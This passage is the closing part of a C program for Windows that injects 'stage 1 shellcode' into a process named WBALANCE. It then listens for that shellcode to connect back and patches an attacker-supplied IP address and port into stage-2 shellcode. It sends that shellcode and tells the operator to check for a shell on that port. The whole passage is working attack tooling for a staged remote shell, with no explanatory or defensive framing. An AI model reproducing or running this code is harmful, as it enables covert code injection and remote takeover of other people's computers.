       strlen(s1_shellcode)+1, NULL)) {
         printf("Failed to inject the s1_shellcode.\n");
         exit(1);
   }

   printf("Injecting stage 1 shellcode into WBALANCE.\n");

   if ((ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) ==
        INVALID_SOCKET) {
      printf("Error creating socket(): %ld\n", WSAGetLastError());
      WSACleanup();
      exit(1);
   }

   service.sin_family = AF_INET;
   service.sin_addr.s_addr = INADDR_ANY;
   service.sin_port = htons(atoi(argv[3]));
  
   if (bind(ListenSocket, (SOCKADDR*) &service, sizeof(service)) ==
       SOCKET_ERROR) {
      printf("bind() failed.\n");
      closesocket(ListenSocket);
      exit(1);
   }

   if (listen(ListenSocket, 1) == SOCKET_ERROR) {
      printf("Error listening on socket.\n");
      exit(1);
   }
   
   printf("Listening for stage 1 shellcode on port %s\n", argv[3]);
   
   AcceptSocket = SOCKET_ERROR;
   while( AcceptSocket == SOCKET_ERROR )
      AcceptSocket = accept(ListenSocket, NULL, NULL);

   printf("Connected!\n");

   //set stage 2 port in s2_shellcode
   s2_shellcode[26] = (BYTE)~(atoi(argv[5])>>8);
   s2_shellcode[27] = (BYTE)~atoi(argv[5]);

   //set stage 2 ip address in s2_shellcode
   sa_cb.sin_addr.s_addr = inet_addr(argv[4]);
   s2_shellcode[18] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b1;
   s2_shellcode[19] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b2;
   s2_shellcode[20] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b3;
   s2_shellcode[21] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b4;
   
   printf("Sending stage 2 shellcode.\n");
   printf("Check for shell on port %s\n", argv[5]);

   send(AcceptSocket, (char*)s2_shellcode, sizeof(s2_shellcode), 0);
   
   closesocket(ListenSocket);
   closesocket(AcceptSocket);
   WSACleanup();

   return 0;
}